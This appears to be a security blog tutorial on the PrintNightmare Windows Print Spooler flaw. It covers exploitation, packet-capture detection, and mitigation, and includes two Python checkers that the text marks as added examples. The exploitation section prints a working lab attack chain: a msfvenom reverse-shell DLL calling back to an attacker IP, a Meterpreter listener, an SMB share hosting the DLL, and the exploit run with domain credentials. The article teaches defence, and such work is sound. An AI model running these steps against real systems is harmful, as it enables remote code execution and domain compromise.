PRINTNIGHTMARE VULNERABILITY

Nathaneal Meththananda
May 31, 2022 · 10 min read

ABOUT THE WINDOWS PRINT SPOOLER

The Windows Print Spooler is a service that manages print jobs sent from a computer to a printer; it also lets the system act as a print client or a print server. A spooler service has to be present on a computer for it to connect to a printer. The main weakness of this service is that it is enabled by default and runs in the SYSTEM context, so an attacker who can abuse it gains privileged access on the system.

This attack is mainly relevant to domain controllers, where the spooler is kept running for printer pruning. In a domain, printers are published as Active Directory objects; pruning is the process by which published printers that are no longer available on the network are removed from AD, so that users do not keep trying to print to a printer that no longer exists.

Spooler Components

There are two CVEs for this vulnerability, one for local privilege escalation (LPE) and one for remote code execution (RCE). The one originally published as an LPE, CVE-2021-1675, was later reclassified as an RCE.

  1. CVE-2021-1675 → This exploit works for both attack vectors, LPE and RCE. Microsoft first classified this CVE as an LPE but later changed it to Remote Code Execution. For reference, the LPE exploit is known as “SharpPrintNightmare”.
  2. CVE-2021-34527 → With this exploit an attacker can remotely load a malicious DLL by hosting the DLL on an SMB server.

An attacker who successfully exploits this vulnerability can run arbitrary code with SYSTEM privileges. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

HOW TO EXPLOIT THE VULNERABILITY REMOTELY

Before exploiting the print spooler remotely, an attacker first verifies whether a host is vulnerable to the PrintNightmare flaw. The same check is useful to a defender: the Impacket tool “rpcdump.py” lists the RPC interfaces a host exposes, and if the print system protocols MS-RPRN and MS-PAR are among them the spooler is reachable over RPC.

┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

EXPLOITATION

The delivery method for this exploit is a malicious DLL. This method is also referred to as ‘file-less’ exploitation, which helps bypass most of the protections on the system, such as antivirus software. In this attack I am going to trick the print spooler service into installing a new driver from a UNC path and loading it; in our case the ‘driver’ is the malicious DLL, which gives us a reverse shell back to our attacker machine.

To create the malicious DLL I’ll be using ‘msfvenom’. Since the target is a 64-bit Windows machine I’ll embed a Windows x64 payload in the DLL, providing the LHOST and LPORT on which we will start a listener for the callback from the DLL. You can find the IP address of your machine by typing “ifconfig”. In a later article I’ll explain how to create a DLL in C++ that adds a user to the Windows system, which could then be used to log in with the provided credentials if the ‘WinRM’ port is open; for now let’s stick to msfvenom. Use the command below to create your malicious DLL.

┌──(root㉿snowdox)-[/home/snowdox]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.103.254 LPORT=9000 -f dll -o /home/snowdox/RedTeam/Print/Print_Mal.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: /home/snowdox/RedTeam/Print/Print_Mal.dll

Now that we have created the malicious DLL, we have to start a listener in the ‘Metasploit Framework’ to receive the ‘Meterpreter’ shell when the DLL is executed on the target. Follow the steps below; at the end, type ‘exploit -j’ to start the listener in the background.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 9000
LPORT => 9000
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.18.103.254:9000
msf6 exploit(multi/handler) >

With the listener running, let’s start an SMB server to host the malicious DLL. Make sure ‘Impacket’ is installed on the machine first: Impacket is an open source collection of Python modules for programmatically constructing and manipulating network protocols. Then change to the directory where you saved the DLL and run the ‘smbserver.py’ script with the command below.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now that everything is set up, start the exploitation with the CVE-2021-1675 PoC, providing the domain controller, the user credentials and the UNC path of the malicious DLL hosted on our system.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# python CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\10.18.103.254\share\Print_Mal.dll'
[*] Connecting to ncacn_np:10.10.220.93[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.18.103.254\share\Print_Mal.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

A few seconds after running the exploit script, the listener we started in ‘Metasploit’ shows that a ‘Meterpreter’ session has been opened, so we can now interact with the victim machine through the ‘Meterpreter’ shell.

Use the command below to list the open sessions in the ‘Metasploit Framework’:

sessions -l

To interact with the created session use the command below; after entering it you will be inside the Meterpreter shell.

sessions -i 1

‘1’ is the session number shown by ‘sessions -l’ in the list of open sessions on the framework.

After executing the ‘shell’ command in the Meterpreter shell you get a Windows command prompt, so you can interact with the system itself.

As the exploit output shows, we obtained “Administrator” access on the system. From here an attacker can pivot to other machines and networks until they are “Domain Admin” in the Active Directory.

DETECTING THE PRINTNIGHTMARE EXPLOIT FROM A TRAFFIC CAPTURE

What’s a PCAP file?

PCAP (packet capture) is the application programming interface (API) and file format used to capture and store network data by traffic capture programs such as ‘Wireshark’. PCAP files are used to analyse networks, monitor bandwidth usage, detect malware and cyber attacks, and troubleshoot the network.

Before analysing the PCAP file, let’s gather some metadata to verify that we are indeed looking at a real PCAP file. For that I first use the “file” utility and “exiftool”, which report metadata that is very useful to a security analyst.

┌──(root㉿snowdox)-[/home/snowdox]
└─# file printnightmare.pcap
printnightmare.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)

From the above result you can see that it is a PCAP file (version 2.4, Ethernet link type) and it also shows the capture length.

┌──(root㉿snowdox)-[/home/snowdox]
└─# exiftool printnightmare.pcap
ExifTool Version Number : 12.41
File Name : printnightmare.pcap
Directory : .
File Size : 6.7 MiB
File Modification Date/Time : 2022:05:23 15:59:14-04:00
File Access Date/Time : 2022:05:23 16:26:20-04:00
File Inode Change Date/Time : 2022:05:23 16:20:30-04:00
File Permissions : -r--------
Error : Unknown file type

Using ‘exiftool’ we can see the modification and access date/time and the permissions of this file.

Using TSHARK

TShark is the command-line version of ‘Wireshark’, a network protocol analyser. ‘tshark’ has two modes: capturing traffic on a live network, and reading packets from a previously saved capture file.

First we need to see how many machines are involved in the traffic captured by the analyst. To list them, use the command below:

tshark -r printnightmare.pcap -q -z endpoints,tcp

The results show many IP addresses in the traffic, meaning many machines appear in this capture, yet only two IP addresses talk to the SMB service on port 445, so those are the ones to look for in Wireshark.

tshark -r printnightmare.pcap -q -z conv,tcp

Only 10.10.114.174 and 10.10.124.236 are in communication, from ports 10.10.114.174:65200 and 10.10.124.236:57554 to port 445 respectively. Port 445 is typically SMB, so we can assume that 10.10.114.174 is the target machine with its SMB port exposed, which makes 10.10.124.236 the attacker machine.

Next let’s check which users have been compromised in the ‘Domain’. Filtering on the NTLM authentication, we can see the user ‘lowprivlarry’ in the ‘printnightmare.local’ domain.

┌──(root㉿snowdox)-[/home/snowdox]
└─# tshark -r printnightmare.pcap -Y ntlmssp.auth.username
Running as user "root" and group "root". This could be dangerous.
8119 142.344290 10.10.124.236 → 10.10.114.174 SMB2 700 Session Setup Request, NTLMSSP_AUTH, User: WIN-1O0UJBNP9G7.printnightmare.local\lowprivlarry
8150 142.404151 10.10.114.174 → 10.10.124.236 SMB2 318 Session Setup Request, NTLMSSP_AUTH, User: \, Unknown NTLMSSP message type

‘TShark’ also gives us a quick way to see which protocols are involved, and nothing more: no real details, just an overview. The -z flag provides overviews, summaries and statistics of protocols, services, layers and other things. Use the following command to list the protocols used in this attack:

┌──(root㉿snowdox)-[/home/snowdox]
└─# tshark -r printnightmare.pcap -q -z io,phs
Running as user "root" and group "root". This could be dangerous.

===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:19353 bytes:6741197
  ip                                     frames:19317 bytes:6738999
    tcp                                  frames:19228 bytes:6720511
      tls                                frames:9824 bytes:4758373
      tcp.segments                       frames:94 bytes:218144
        tls                              frames:69 bytes:204520
      data                               frames:137 bytes:679768
      nbss                               frames:792 bytes:216383
        smb                              frames:2 bytes:254
        smb2                             frames:790 bytes:216129
          data                           frames:20 bytes:23520
      http                               frames:4 bytes:1432
        data-text-lines                  frames:1 bytes:291
        xml                              frames:1 bytes:579
    udp                                  frames:89 bytes:18488
      dns                                frames:36 bytes:4897
      quic                               frames:30 bytes:9708
        quic                             frames:2 bytes:2644
          quic                           frames:2 bytes:2644
      nbdgm                              frames:1 bytes:243
        smb                              frames:1 bytes:243
          mailslot                       frames:1 bytes:243
            browser                      frames:1 bytes:243
      ssdp                               frames:12 bytes:2592
      llmnr                              frames:6 bytes:608
      nbns                               frames:4 bytes:440
  arp                                    frames:30 bytes:1470
  ipv6                                   frames:6 bytes:728
    udp                                  frames:6 bytes:728
      llmnr                              frames:6 bytes:728
===================================================================

To find more information about this packet capture I turned to the ‘Wireshark’ GUI. Since we know that, to compromise a machine running the Print Spooler, the attacker uses a malicious DLL to get a connection back, I used the ‘search’ utility in the tool to find any DLL transfers on the network.

This is what I typed on the search bar to find the DLL file:

search --> '.dll'

Here I found the DLL file used in this attack, and in the image below I found the SMB share from which the attacker had the target fetch the malicious DLL.
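As an added example (not part of the original article), the following Python script applies the same reasoning to tshark’s packet summary lines: it extracts the NTLM user, notes which host had its spoolss named pipe opened (the RPC path into the spooler), and flags that host when it later opens a .dll on another machine’s SMB share, which is the UNC-path driver load described above. The sample lines are constructed to resemble the tshark output shown earlier; the frame numbers, the DCERPC bind line and the file name are assumptions made for the example.

```python
import re

# Constructed tshark summary lines (frame, time, src -> dst, protocol, length, info)
# in the format tshark prints when reading a capture with -r. Written for this
# example; they are not taken from the article's capture.
SAMPLE_LINES = """\
8119 142.344290 10.10.124.236 → 10.10.114.174 SMB2 700 Session Setup Request, NTLMSSP_AUTH, User: WIN-1O0UJBNP9G7.printnightmare.local\\lowprivlarry
8131 142.381002 10.10.124.236 → 10.10.114.174 SMB2 242 Create Request File: spoolss
8140 142.392110 10.10.124.236 → 10.10.114.174 DCERPC 210 Bind: call_id: 1, Fragment: Single, 1 context items: MS-RPRN V1.0
8150 142.404151 10.10.114.174 → 10.10.124.236 SMB2 318 Session Setup Request, NTLMSSP_AUTH, User: \\, Unknown NTLMSSP message type
8177 143.120004 10.10.114.174 → 10.10.124.236 SMB2 230 Create Request File: share\\Print_Mal.dll
8190 143.250001 10.10.114.174 → 10.10.124.236 SMB2 166 Read Request Len:8704 Off:0 File: share\\Print_Mal.dll
9001 150.000000 10.10.114.174 → 8.8.8.8 DNS 74 Standard query 0x1a2b A example.com
"""

LINE_RE = re.compile(
    r"^(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+(?:→|->)\s+(?P<dst>\S+)"
    r"\s+(?P<proto>\S+)\s+(?P<length>\d+)\s+(?P<info>.*)$"
)
USER_RE = re.compile(r"User:\s+(\S+)")
FILE_RE = re.compile(r"File:\s+(\S+)")


def parse_lines(text):
    """Parse tshark summary lines into dicts; lines that do not match are skipped."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["frame"] = int(rec["frame"])
        rec["time"] = float(rec["time"])
        rec["length"] = int(rec["length"])
        records.append(rec)
    return records


def analyse(records):
    """Correlate three indicators of a PrintNightmare-style attack:
    1. an NTLM authentication naming the account used,
    2. a host having its spoolss named pipe opened (RPC into the spooler),
    3. that same host later opening a .dll on another machine's SMB share."""
    report = {"ntlm_users": [], "dll_fetches": [], "suspected_victims": [], "staging_hosts": []}
    spoolss_opened = {}  # host whose spoolss pipe was opened -> first frame number
    for rec in sorted(records, key=lambda r: r["frame"]):
        info = rec["info"]
        um = USER_RE.search(info)
        if um:
            user = um.group(1).rstrip(",")
            if user.strip("\\"):  # skip the empty "\" user of a failed or anonymous setup
                report["ntlm_users"].append(
                    {"user": user, "client": rec["src"], "server": rec["dst"], "frame": rec["frame"]})
        fm = FILE_RE.search(info)
        if not fm or not info.startswith("Create Request"):
            continue
        name = fm.group(1)
        if name.lower() == "spoolss":
            spoolss_opened.setdefault(rec["dst"], rec["frame"])
        elif name.lower().endswith(".dll"):
            report["dll_fetches"].append(
                {"file": name, "fetched_by": rec["src"], "served_by": rec["dst"], "frame": rec["frame"]})
            # A host that had spoolss opened and then pulls a DLL from a remote share
            # matches the driver-from-UNC-path load the article describes.
            if rec["src"] in spoolss_opened and rec["frame"] > spoolss_opened[rec["src"]]:
                if rec["src"] not in report["suspected_victims"]:
                    report["suspected_victims"].append(rec["src"])
                if rec["dst"] not in report["staging_hosts"]:
                    report["staging_hosts"].append(rec["dst"])
    return report


if __name__ == "__main__":
    import json
    import sys
    # Reads tshark output from a pipe, or falls back to the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LINES
    print(json.dumps(analyse(parse_lines(text)), indent=2))
```

To run it against a real capture, pipe tshark into the script with the default columns, for example `tshark -r printnightmare.pcap -Y 'smb2 || dcerpc' | python3 detect.py`; older tshark builds print `->` instead of `→`, which the regex also accepts. The key signal is the direction reversal: the machine that received the spooler RPC call is the one that then initiates an outbound SMB connection to fetch a DLL.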

MITIGATION

Method 1:

DISABLING PRINT SPOOLER SERVICE USING POWERSHELL

To protect your infrastructure against the PrintNightmare vulnerability, first identify the service on the systems concerned, in this case your “Active Directory”. Use the following PowerShell cmdlet to identify the Print Spooler service.

PS C:\Users\Nathaneal> Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

The result above shows that the system has a running “Print Spooler” service. Next, if your organisation is fine with disabling this service, use PowerShell to stop it.

PS C:\Users\Nathaneal> Stop-Service -Name Spooler -Force

This command stops the running service on the current system (or on the Active Directory server you are connected to).

PS C:\Users\Nathaneal> Set-Service -Name Spooler -StartupType Disabled

This command makes sure the service is not started again when the system reboots. After disabling the service completely, use the “rpcdump.py” tool to confirm that the system is no longer vulnerable to the PrintNightmare exploit.

┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'

After disabling the service the command above no longer lists the print system protocols, and neither exploit (RCE or LPE) works against the system.

Method 2:

DISABLING INBOUND REMOTE PRINTING THROUGH GROUP POLICY

On Active Directory machines that need to print locally or through a shared printer, where the ‘Print Spooler’ cannot be disabled, you can instead disable inbound remote printing. This shuts down the print server functionality within the Print Spooler service and prevents the RCE exploit from compromising the system, although the Local Privilege Escalation (LPE) variant still applies.

To configure the inbound policy, go to the following location on the Windows machine:

Computer Configuration > Policies > Administrative Templates > Printers

then open “Allow Print Spooler to accept client connections” and choose “Disabled” to block remote attacks from adversaries.

To protect and detect attacks in the internal infrastructure, using EDR and antivirus solutions is a good idea. To prevent individual attacks on a system you can also set the following registry values to ‘0’, but keep in mind that these keys do not exist by default.

Under the key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint:

1. NoWarningNoElevationOnInstall = 0 (DWORD)
2. NoWarningNoElevationOnUpdate = 0 (DWORD)
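As an added example (not the article’s code), the following Python audit logic evaluates the posture described in Method 1 and Method 2 from a constructed snapshot of a host’s state: the Spooler service status and start type, the two Point and Print registry values, the “Allow Print Spooler to accept client connections” policy, and which print protocols rpcdump.py still lists. The snapshot layout, the `role` label that says whether a host legitimately shares printers, and the host names are assumptions made for the example. Because the article notes that the Point and Print keys do not exist by default, an absent value is treated as the default behaviour, equivalent to 0, and only an explicit non-zero value is reported.

```python
# Identifiers from the article's mitigation section.
POINT_AND_PRINT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
HARDENING_VALUES = ("NoWarningNoElevationOnInstall", "NoWarningNoElevationOnUpdate")
REMOTE_PRINT_POLICY = "Allow Print Spooler to accept client connections"
GPO_PATH = "Computer Configuration > Policies > Administrative Templates > Printers"
SPOOLER_RPC = {"MS-RPRN", "MS-PAR"}


def assess_host(snapshot):
    """Return a list of (severity, message) findings for one host snapshot.

    `snapshot` is a plain dict (an assumed layout, constructed for this example)
    with the keys role, services, registry, policies and rpc_endpoints.
    """
    findings = []
    needs_spooler = snapshot.get("role") == "print_server"  # hypothetical role label
    svc = snapshot.get("services", {}).get("Spooler")

    if svc is None:
        findings.append(("info", "Spooler service not present on this host"))
    elif not needs_spooler:
        # Method 1: a host that does not share printers should not run the spooler at all.
        if svc["status"].lower() == "running":
            findings.append(("high", "Print Spooler is running; Stop-Service -Name Spooler -Force"))
        if svc["start_type"].lower() != "disabled":
            findings.append(("high", f"Spooler start type is {svc['start_type']}; "
                                     "Set-Service -Name Spooler -StartupType Disabled"))
    else:
        # Method 2: a print server must keep the spooler, so block inbound remote printing instead.
        if snapshot.get("policies", {}).get(REMOTE_PRINT_POLICY) != "Disabled":
            findings.append(("high", f"'{REMOTE_PRINT_POLICY}' is not Disabled; set it under {GPO_PATH}"))
        else:
            findings.append(("info", "Inbound remote printing disabled: remote exploitation is blocked, "
                                     "but the LPE variant still applies until the host is patched"))

    # Point and Print hardening: an absent value behaves as 0, so only an explicit non-zero is a finding.
    pap = snapshot.get("registry", {}).get(POINT_AND_PRINT_KEY, {})
    for name in HARDENING_VALUES:
        value = pap.get(name)
        if value not in (None, 0):
            findings.append(("high", f"{name} = {value}; set it to 0 (DWORD) under {POINT_AND_PRINT_KEY}"))

    # Network-side evidence: rpcdump.py still listing the print protocols means the spooler is reachable.
    exposed = SPOOLER_RPC & set(snapshot.get("rpc_endpoints", []))
    if exposed and not needs_spooler:
        findings.append(("high", f"rpcdump still lists {', '.join(sorted(exposed))}; spooler reachable over RPC"))
    return findings


def is_exposed(snapshot):
    """True when any high-severity finding remains for the host."""
    return any(sev == "high" for sev, _ in assess_host(snapshot))


# Constructed snapshots (hypothetical hosts), in the shape an audit script could
# build from Get-Service, the registry and rpcdump.py output.
DC_UNHARDENED = {
    "host": "dc01.example.local",
    "role": "domain_controller",
    "services": {"Spooler": {"status": "Running", "start_type": "Automatic"}},
    "registry": {POINT_AND_PRINT_KEY: {"NoWarningNoElevationOnInstall": 1, "NoWarningNoElevationOnUpdate": 1}},
    "policies": {},
    "rpc_endpoints": ["MS-RPRN", "MS-PAR"],
}
PRINT_SERVER_HARDENED = {
    "host": "print01.example.local",
    "role": "print_server",
    "services": {"Spooler": {"status": "Running", "start_type": "Automatic"}},
    "registry": {},  # PointAndPrint key absent: behaves as if both values were 0
    "policies": {REMOTE_PRINT_POLICY: "Disabled"},
    "rpc_endpoints": [],
}

if __name__ == "__main__":
    for snap in (DC_UNHARDENED, PRINT_SERVER_HARDENED):
        print(snap["host"], "EXPOSED" if is_exposed(snap) else "ok")
        for severity, message in assess_host(snap):
            print(f"  [{severity}] {message}")
```

The two branches encode the decision the article leaves to the reader: if a host does not need to share printers, the only clean answer is Method 1 (stop and disable the service and confirm with rpcdump.py); if it does, Method 2 removes the remote path but leaves the LPE variant, which is why the hardened print server still gets an informational finding rather than a clean bill.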

I hope you now have an idea of how a domain user can be compromised with the ‘PrintNightmare’ exploit. This is a simple but comprehensive guide on how to exploit and detect the attack; in the coming days I hope to write about the internal mechanism of this attack.

Nathaneal Meththananda

19 years | Security Engineer | Malware Analyst | Penetration Tester | Sri Lankan